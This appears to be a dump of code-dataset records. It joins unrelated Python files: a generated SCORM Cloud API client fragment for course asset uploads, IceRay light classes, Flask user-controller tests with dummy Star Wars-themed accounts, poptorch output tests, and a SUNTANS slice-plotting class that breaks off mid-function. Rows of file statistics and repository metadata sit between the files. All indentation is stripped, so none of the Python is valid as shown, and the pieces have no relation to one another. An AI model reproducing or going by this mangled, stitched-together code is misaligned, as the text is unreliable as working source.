if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'update_asset_policy' in params:
query_params.append(('updateAssetPolicy', params['update_asset_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file'] # noqa: E501
if 'destination' in params:
form_params.append(('destination', params['destination'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset/upload', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssetFileSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_course_version_asset_file(self, course_id, version_id, destination, **kwargs): # noqa: E501
"""Upload an asset file for Course Version # noqa: E501
Creates or updates an asset file uploaded from your file system into the course version. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_course_version_asset_file(course_id, version_id, destination, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
:param file file: The asset file to import into the course.
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.upload_course_version_asset_file_with_http_info(course_id, version_id, destination, **kwargs) # noqa: E501
else:
(data) = self.upload_course_version_asset_file_with_http_info(course_id, version_id, destination, **kwargs) # noqa: E501
return data
def upload_course_version_asset_file_with_http_info(self, course_id, version_id, destination, **kwargs): # noqa: E501
"""Upload an asset file for Course Version # noqa: E501
Creates or updates an asset file uploaded from your file system into the course version. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_course_version_asset_file_with_http_info(course_id, version_id, destination, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
:param file file: The asset file to import into the course.
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'destination', 'file', 'update_asset_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_course_version_asset_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `upload_course_version_asset_file`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `upload_course_version_asset_file`") # noqa: E501
# verify the required parameter 'destination' is set
if ('destination' not in params or
params['destination'] is None):
raise ValueError("Missing the required parameter `destination` when calling `upload_course_version_asset_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'update_asset_policy' in params:
query_params.append(('updateAssetPolicy', params['update_asset_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file'] # noqa: E501
if 'destination' in params:
form_params.append(('destination', params['destination'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset/upload', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssetFileSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 50.891899 | 1,184 | 0.64998 | 24,720 | 199,140 | 5.018972 | 0.022573 | 0.042106 | 0.015798 | 0.020311 | 0.989901 | 0.987072 | 0.984081 | 0.981478 | 0.977956 | 0.97561 | 0 | 0.014422 | 0.268801 | 199,140 | 3,912 | 1,185 | 50.904908 | 0.837636 | 0.424566 | 0 | 0.826311 | 1 | 0 | 0.227793 | 0.068445 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03324 | false | 0 | 0.030431 | 0 | 0.113296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
cffd3ff7a7ef88eccbc4e51e799f86aca3f2acfc | 2,587 | py | Python | src/IceRayPy/utility/light/chandelier.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | [
"MIT-0"
] | 2 | 2020-09-04T12:27:15.000Z | 2022-01-17T14:49:40.000Z | src/IceRayPy/utility/light/chandelier.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | [
"MIT-0"
] | null | null | null | src/IceRayPy/utility/light/chandelier.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | [
"MIT-0"
] | 1 | 2020-09-04T12:27:52.000Z | 2020-09-04T12:27:52.000Z |
import ctypes
import IceRayPy
Pointer = ctypes.POINTER
AddresOf = ctypes.addressof
Coord3D = IceRayPy.type.math.coord.Scalar3D
Color = IceRayPy.type.color.RGB
class Hexa:
def __init__( self, P_dll ):
center = Coord3D( 0, 0, -2 )
radius = 2
c0 = 0.0 * 0.8
c1 = 1.4 * 0.8
c2 = 1.6 * 0.8
color0 = { "-X" : Color( c0, c0, c0 ), "+X" : Color( c0, c0, c0 ), "-Y" : Color( c0, c0, c0 ), "+Y" : Color( c0, c0, c0), "+Z" : Color( c0, c0, c0), "-Z" : Color( c0, c0, c0) }
color1 = { "-X" : Color( c1, c1, c1 ), "+X" : Color( c1, c1, c1 ), "-Y" : Color( c1, c1, c1 ), "+Y" : Color( c1, c1, c1), "+Z" : Color( c1, c1, c1), "-Z" : Color( c1, c1, c1) }
color2 = { "-X" : Color( c2, c2, c2 ), "+X" : Color( c2, c2, c2 ), "-Y" : Color( c2, c2, c2 ), "+Y" : Color( c2, c2, c2), "+Z" : Color( c2, c2, c2), "-Z" : Color( c2, c2, c2) }
self.m_implementation = IceRayPy.core.light.Chandelier( P_dll )
self.m_cargo = self.m_implementation.m_cargo
spot = IceRayPy.core.light.Spot( Coord3D( radius+center[0], 0, 0 ), color0['+X'], color1['+X'], color2['+X'] )
self.m_implementation.push( IceRayPy.core.light.Point( P_dll, spot ) )
spot = IceRayPy.core.light.Spot( Coord3D( -radius+center[0], 0, 0 ), color0['-X'], color1['-X'], color2['-X'] )
self.m_implementation.push( IceRayPy.core.light.Point( P_dll, spot ) )
spot = IceRayPy.core.light.Spot( Coord3D( 0, radius+center[1], 0 ), color0['+Y'], color1['+Y'], color2['+Y'] )
self.m_implementation.push( IceRayPy.core.light.Point( P_dll, spot ) )
spot = IceRayPy.core.light.Spot( Coord3D( 0, -radius+center[1], 0 ), color0['-Y'], color1['-Y'], color2['-Y'] )
self.m_implementation.push( IceRayPy.core.light.Point( P_dll, spot ) )
spot = IceRayPy.core.light.Spot( Coord3D( 0, 0, radius+center[2] ), color0['+Z'], color1['+Z'], color2['+Z'] )
self.m_implementation.push( IceRayPy.core.light.Point( P_dll, spot ) )
def __del__( self ):
pass # Do nothing
class Octa:
def __init__( self, P_dll ):
self.m_implementation = IceRayPy.core.light.Chandelier( P_dll )
self.m_cargo = self.m_implementation.m_cargo
def __del__( self ):
pass # Do nothing
class Tetra:
def __init__( self, P_dll ):
self.m_implementation = IceRayPy.core.light.Chandelier( P_dll )
self.m_cargo = self.m_implementation.m_cargo
def __del__( self ):
pass # Do nothing
| 39.8 | 185 | 0.563974 | 366 | 2,587 | 3.844262 | 0.142077 | 0.049751 | 0.157072 | 0.046908 | 0.828003 | 0.789623 | 0.789623 | 0.766169 | 0.766169 | 0.64037 | 0 | 0.05919 | 0.255508 | 2,587 | 64 | 186 | 40.421875 | 0.67134 | 0.01237 | 0 | 0.47619 | 0 | 0 | 0.026559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.071429 | 0.047619 | 0 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
3201c627c44c3216da6318946c3273077b98380a | 10,225 | py | Python | test/app/controllers/test_user_controller.py | dmaiabjj/luiza-lab-api-challenger | 8f55ebbdd49a170ca3fdf38da229d29bd0548adf | [
"MIT"
] | null | null | null | test/app/controllers/test_user_controller.py | dmaiabjj/luiza-lab-api-challenger | 8f55ebbdd49a170ca3fdf38da229d29bd0548adf | [
"MIT"
] | null | null | null | test/app/controllers/test_user_controller.py | dmaiabjj/luiza-lab-api-challenger | 8f55ebbdd49a170ca3fdf38da229d29bd0548adf | [
"MIT"
] | null | null | null | from werkzeug.security import generate_password_hash
from app.domain.user.user import User, UserRole, RoleCategory
from test import build_header, DATE_FORMAT
from test.conftest import set_up
def test_add_user(client, db):
set_up(db)
response = client.post('/api/auth/user/token', json=dict(
email="luke@luizalabs.com.br",
password="darthVaderIsMyFather"
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
headers = build_header(access_token)
name = "Anakin Skywalker"
email = "anakin@luizalabs.com.br"
password = "iAmDarthVader"
response = client.post('/api/user', json=dict(
name=name,
email=email,
password=password
), headers=headers, follow_redirects=True)
assert response.status_code == 200
assert response.json['id']
assert response.json['name'] == name
assert response.json['email'] == email
assert response.json['created_date']
user = db.session.query(User).filter_by(id=response.json['id']).one_or_none()
assert user
assert user.id == response.json['id']
assert user.name == response.json['name']
assert user.email == response.json['email']
assert user.created_date.strftime(DATE_FORMAT) == response.json['created_date']
assert user.verify_password(password)
def test_update_user(client, db):
set_up(db)
password = "iAmDarthVader"
user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
password=generate_password_hash(password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
db.session.add(user)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email=user.email,
password=password
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
name = "Darth Vader"
email = "darthvader@starwars.com"
headers = build_header(access_token)
response = client.put('/api/user', json=dict(
name=name,
email=email
), headers=headers, follow_redirects=True)
assert response.status_code == 200
assert response.json['id']
assert response.json['name'] == name
assert response.json['email'] == email
assert response.json['created_date']
assert response.json['updated_date']
user_db = db.session.query(User).filter_by(id=response.json['id']).one_or_none()
assert user_db
assert user_db.id == response.json['id']
assert user_db.name == response.json['name']
assert user_db.email == response.json['email']
assert user_db.created_date.strftime(DATE_FORMAT) == response.json['created_date']
assert user_db.updated_date.strftime(DATE_FORMAT) == response.json['updated_date']
assert user_db.verify_password(password)
def test_delete_user(client, db):
set_up(db)
password = "iAmDarthVader"
user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
password=generate_password_hash(password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
db.session.add(user)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email=user.email,
password=password
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
headers = build_header(access_token)
response = client.delete('/api/user', headers=headers, follow_redirects=True)
assert response.status_code == 200
user_db = db.session.query(User).filter_by(id=user.id).one_or_none()
assert user_db
assert user_db.id == user.id
assert user_db.name == user.name
assert user_db.email == user.email
assert user_db.verify_password(password)
assert user_db.created_date.strftime(DATE_FORMAT) == user.created_date.strftime(DATE_FORMAT)
assert user_db.updated_date.strftime(DATE_FORMAT) == user.updated_date.strftime(DATE_FORMAT)
assert user_db.deleted_date
def test_change_customer_password(client, db):
set_up(db)
password = "iAmDarthVader"
user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
password=generate_password_hash(password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
db.session.add(user)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email=user.email,
password=password
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
new_password = "iAmVader"
headers = build_header(access_token)
response = client.put('/api/user/password', json=dict(
password=password,
new_password=new_password
), headers=headers, follow_redirects=True)
assert response.status_code == 200
user_db = db.session.query(User).filter_by(id=user.id).one_or_none()
assert user_db.verify_password(new_password)
def test_get_user(client, db):
set_up(db)
password = "iAmDarthVader"
user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
password=generate_password_hash(password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
db.session.add(user)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email=user.email,
password=password
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
headers = build_header(access_token)
response = client.get('/api/user', headers=headers, follow_redirects=True)
assert response.status_code == 200
assert response.json['id'] == user.id
assert response.json['name'] == user.name
assert response.json['email'] == user.email
assert user.verify_password(password)
def test_get_user_by_id(client, db):
set_up(db)
password = "iAmDarthVader"
user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
password=generate_password_hash(password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
db.session.add(user)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email="luke@luizalabs.com.br",
password="darthVaderIsMyFather"
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
headers = build_header(access_token)
response = client.get(f'/api/user/{user.id}', headers=headers, follow_redirects=True)
assert response.status_code == 200
assert response.json['id'] == user.id
assert response.json['name'] == user.name
assert response.json['email'] == user.email
assert user.verify_password(password)
def test_get_user_by_email(client, db):
set_up(db)
password = "iAmDarthVader"
user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
password=generate_password_hash(password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
db.session.add(user)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email="luke@luizalabs.com.br",
password="darthVaderIsMyFather"
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
headers = build_header(access_token)
response = client.get(f'/api/user/email/{user.email}', headers=headers, follow_redirects=True)
assert response.status_code == 200
assert response.json['id'] == user.id
assert response.json['name'] == user.name
assert response.json['email'] == user.email
assert user.verify_password(password)
def test_get_all_user(client, db):
set_up(db)
user_1_password = "youAreMyOnlyHope"
user_2_password = "iKnow"
user_1 = User(name='Leia Organa', email='leia@luizalabs.com.br',
password=generate_password_hash(user_1_password),
roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
user_2 = User(name="Han Solo", email="han@starwars.com",
password=generate_password_hash(user_2_password))
db.session.add(user_1)
db.session.add(user_2)
db.session.commit()
response = client.post('/api/auth/user/token', json=dict(
email="luke@luizalabs.com.br",
password="darthVaderIsMyFather"
), follow_redirects=True)
assert response.status_code == 200
assert response.json['access_token'] is not None
access_token = response.json['access_token']
headers = build_header(access_token)
response = client.get(f'/api/user/', headers=headers, follow_redirects=True)
assert response.status_code == 200
assert len(response.json) == 3
users = db.session.query(User).all()
for index, customer in enumerate(response.json, start=0):
user_db = users[index]
assert user_db.id == customer['id']
assert user_db.name == customer['name']
assert user_db.email == customer['email']
response = client.get(f'/api/user/1/1', headers=headers, follow_redirects=True)
assert response.status_code == 200
assert len(response.json) == 1
users = db.session.query(User).all()
user_db = users[0]
user = response.json[0]
assert user_db.id == user['id']
assert user_db.name == user['name']
assert user_db.email == user['email']
| 33.9701 | 108 | 0.690856 | 1,307 | 10,225 | 5.240245 | 0.077276 | 0.085852 | 0.068331 | 0.062053 | 0.891079 | 0.871368 | 0.817346 | 0.798803 | 0.772668 | 0.764199 | 0 | 0.007905 | 0.183472 | 10,225 | 300 | 109 | 34.083333 | 0.812433 | 0 | 0 | 0.688889 | 1 | 0 | 0.126944 | 0.031002 | 0 | 0 | 0 | 0 | 0.337778 | 1 | 0.035556 | false | 0.173333 | 0.017778 | 0 | 0.053333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
5c623cd1e8e718eaaaa8b2e81c4c321d89a3f64c | 75 | py | Python | ChromProcess/Utils/peak_finding/__init__.py | thijsdejong10/ChromProcess | aba9c261824d0f29e0a92d7ca7c4a78e03249d62 | [
"BSD-3-Clause"
] | null | null | null | ChromProcess/Utils/peak_finding/__init__.py | thijsdejong10/ChromProcess | aba9c261824d0f29e0a92d7ca7c4a78e03249d62 | [
"BSD-3-Clause"
] | null | null | null | ChromProcess/Utils/peak_finding/__init__.py | thijsdejong10/ChromProcess | aba9c261824d0f29e0a92d7ca7c4a78e03249d62 | [
"BSD-3-Clause"
] | null | null | null | from .pick_peaks import find_peaks
from .pick_peaks import find_peaks_scipy | 37.5 | 40 | 0.88 | 13 | 75 | 4.692308 | 0.461538 | 0.262295 | 0.42623 | 0.622951 | 0.918033 | 0.918033 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093333 | 75 | 2 | 40 | 37.5 | 0.897059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
5c9243512551e75fefe6681156a59ba9a000cf67 | 2,693 | py | Python | tests/outputs_test.py | NunoEdgarGFlowHub/poptorch | 2e69b81c7c94b522d9f57cc53d31be562f5e3749 | [
"MIT"
] | null | null | null | tests/outputs_test.py | NunoEdgarGFlowHub/poptorch | 2e69b81c7c94b522d9f57cc53d31be562f5e3749 | [
"MIT"
] | null | null | null | tests/outputs_test.py | NunoEdgarGFlowHub/poptorch | 2e69b81c7c94b522d9f57cc53d31be562f5e3749 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import torch
import torch.nn as nn
import poptorch
import poptorch.testing
def test_multiple_tensors():
class Network(nn.Module):
def forward(self, x, y):
t1 = (x + y)
t2 = (t1, x * y)
return t2[0], y - x, t2[1] + t1
# Create our model.
model = Network()
inference_model = poptorch.inferenceModel(model)
x = torch.ones(2)
y = torch.zeros(2)
ipu = inference_model(x, y)
ref = model(x, y)
assert poptorch.testing.allclose(
ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_simple_list():
class Network(nn.Module):
def forward(self, x, y):
t1 = (x + y)
t2 = (t1, x * y)
return [t2[0], y - x, t2[1] + t1]
# Create our model.
model = Network()
inference_model = poptorch.inferenceModel(model)
x = torch.ones(2)
y = torch.zeros(2)
ipu = inference_model(x, y)
ref = model(x, y)
assert poptorch.testing.allclose(
ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_simple_tuple():
class Network(nn.Module):
def forward(self, x, y):
t1 = (x + y)
t2 = (t1, x * y)
return (t2[0], y - x, t2[1] + t1)
# Create our model.
model = Network()
inference_model = poptorch.inferenceModel(model)
x = torch.ones(2)
y = torch.zeros(2)
ipu = inference_model(x, y)
ref = model(x, y)
assert poptorch.testing.allclose(
ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_nested_tuples():
class Network(nn.Module):
def forward(self, x, y):
t1 = (x + y)
t2 = (t1, x * y)
return x, (t2, y - x, t2[1] + t1), (y, ((t1 * 2.0)))
# Create our model.
model = Network()
inference_model = poptorch.inferenceModel(model)
x = torch.ones(2)
y = torch.zeros(2)
ipu = inference_model(x, y)
ref = model(x, y)
assert poptorch.testing.allclose(
ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_same_tensor():
class Network(nn.Module):
def forward(self, x, y):
t1 = (x + y)
t2 = (t1, x * y)
return t1, (t1, t2, t1)
# Create our model.
model = Network()
inference_model = poptorch.inferenceModel(model)
x = torch.ones(2)
y = torch.zeros(2)
ipu = inference_model(x, y)
ref = model(x, y)
assert poptorch.testing.allclose(
ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
| 22.441667 | 73 | 0.556257 | 380 | 2,693 | 3.889474 | 0.157895 | 0.03383 | 0.027064 | 0.067659 | 0.872124 | 0.867388 | 0.867388 | 0.867388 | 0.867388 | 0.867388 | 0 | 0.029995 | 0.306721 | 2,693 | 119 | 74 | 22.630252 | 0.76165 | 0.061641 | 0 | 0.810811 | 0 | 0 | 0.077381 | 0 | 0 | 0 | 0 | 0 | 0.067568 | 1 | 0.135135 | false | 0 | 0.054054 | 0 | 0.324324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5cb5abfa367a35bf938910aaa00157b14841c3cc | 78,428 | py | Python | sfoda/suntans/sunslice.py | mrayson/sfoda | 5bae0894f6e1bad8f9809f874e4fbbf99daae5d6 | [
"BSD-2-Clause"
] | 1 | 2022-01-30T08:45:09.000Z | 2022-01-30T08:45:09.000Z | sfoda/suntans/sunslice.py | mrayson/sfoda | 5bae0894f6e1bad8f9809f874e4fbbf99daae5d6 | [
"BSD-2-Clause"
] | 4 | 2020-11-26T12:06:20.000Z | 2021-04-16T07:10:36.000Z | sfoda/suntans/sunslice.py | mrayson/sfoda | 5bae0894f6e1bad8f9809f874e4fbbf99daae5d6 | [
"BSD-2-Clause"
] | 1 | 2021-06-13T10:12:47.000Z | 2021-06-13T10:12:47.000Z | # -*- coding: utf-8 -*-
"""
Object for vertical slicing SUNTANS model output
Created on Wed Jul 03 12:29:14 2013
@author: mrayson
"""
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
import matplotlib.animation as animation
from shapely.geometry import LineString, Point
from sfoda.ugrid.hybridgrid import Line
from sfoda.ugrid.hybridgrid import Point as GPoint
from sfoda.ugrid.gridsearch import GridSearch
from .sunpy import Spatial
from .sunpy import unsurf
class Slice(Spatial):
"""
Suntans vertical slice class
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100):
Spatial.__init__(self,ncfile,klayer=[-99])
# Calculate the horizontal coordinates of the slice
self.Npt = Npt
self.nslice = Npt # For compatibility with other slice classes
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords()
# Initialise the slice interpolation object
self._initInterp()
def __call__(self,variable,tstep,method='nearest'):
"""
Load the data and interpolate on the slice
"""
self.tstep=tstep
try:
self.Ntslice = len(tstep)
except:
tstep=[tstep]
self.Ntslice = 1
self.data = self.loadData(variable,method=method)
return self.data.squeeze()
def pcolorslice(self, z, t=0,xaxis='xslice',\
titlestr=None, bathyoverlay=True, colorbar=True, shading='auto',**kwargs):
"""
Pcolor plot of the slice
Returns a handle to the pcolor object and the colorbar
"""
# Find the colorbar limits if unspecified
#a=self.data[t,:].squeeze()
am = np.ma.array (z, mask=np.isnan(self.data))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
#h1 = plt.pcolor(self[xaxis],self.zslice,am,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
X,Z = np.meshgrid(self[xaxis], self.zslice)
h1 = plt.pcolormesh(X, Z, am,vmin=self.clim[0],vmax=self.clim[1],
shading=shading,**kwargs)
#h1 = plt.imshow(am,vmin=self.clim[0],vmax=self.clim[1],\
# extent=[self[xaxis].min(), self[xaxis].max(),\
# -self.z_w[-1], -self.z_w[0]], aspect='auto',\
# **kwargs)
#Overlay the bed
if bathyoverlay:
self._overlayBathy(self[xaxis],facecolor=[0.5,0.5,0.5])
#self._overlayBathy(self[xaxis][0,:],facecolor=[0.5,0.5,0.5])
# Set labels etc
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Depth [m]')
plt.xlim([self[xaxis].min(),self[xaxis].max()])
plt.ylim([self.hslice.min(),0])
if colorbar:
axcb = plt.colorbar(h1)
else:
axcb = None
if titlestr is None:
title = plt.title(self.__genTitle())
else:
title = plt.title(titlestr)
return h1, axcb, title
def contourslice(self,z,t=0,xaxis='xslice',clevs=20,titlestr=None,bathyoverlay=True,\
filled = True, outline = False,colorbar=True,**kwargs):
"""
Filled-contour plot of the slice
Returns a handle to the pcolor object and the colorbar
"""
if not filled:
outline=True
#a=self.data[t,:].squeeze()
am = np.ma.array (z, mask=np.isnan(z))
# Find the colorbar limits if unspecified
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
klayer,Nkmax = self.get_klayer()
if type(clevs)==type(1): # is integer
V = np.linspace(self.clim[0],self.clim[1],clevs)
else:
V = clevs
if filled:
h1 = plt.contourf(self[xaxis],self.zslice,am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
if outline:
h2 = plt.contour(self[xaxis],self.zslice,am,V,**kwargs)
#Overlay the bed
if bathyoverlay:
self._overlayBathy(self[xaxis][:],facecolor=[0.5,0.5,0.5])
# Set labels etc
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Depth [m]')
plt.xlim([self[xaxis].min(),self[xaxis].max()])
plt.ylim([self.hslice.min(),0])
if colorbar and filled:
axcb = plt.colorbar(h1)
if titlestr is None:
plt.title(self.__genTitle())
else:
plt.title(titlestr)
if filled and not outline:
return h1,
elif not filled and outline:
return h2,
elif filled and outline:
return h1, h2,
def xtplot(self,zlayer=0,xaxis='xslice',clevs=20,titlestr=None,**kwargs):
"""
x-t contour plot of the sliced variable along vertical layer, 'zlayer'.
zlayer can be:
[0 - Nkmax] - vertical layer number
'seabed' - seabed value
'diff' - top minus bottom difference)
"""
#kbed = np.max(self.Nk[self.cellind]-1,0)
kbed = self.Nk[self.cellind]
if zlayer == 'seabed':
a= self.data[:,kbed,list(range(0,self.Npt))]
zstring = 'seabed'
elif zlayer == 'diff':
atop = self.data[:,0,:]
abot = self.data[:,kbed,list(range(0,self.Npt))]
a = atop - abot
zstring = 'Surface value - seabed value'
else:
a = self.data[:,zlayer,:]
zstring = '%3.1f [m]'%self.z_r[zlayer]
am = np.ma.array (a, mask=np.isnan(a))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
V = np.linspace(self.clim[0],self.clim[1],clevs)
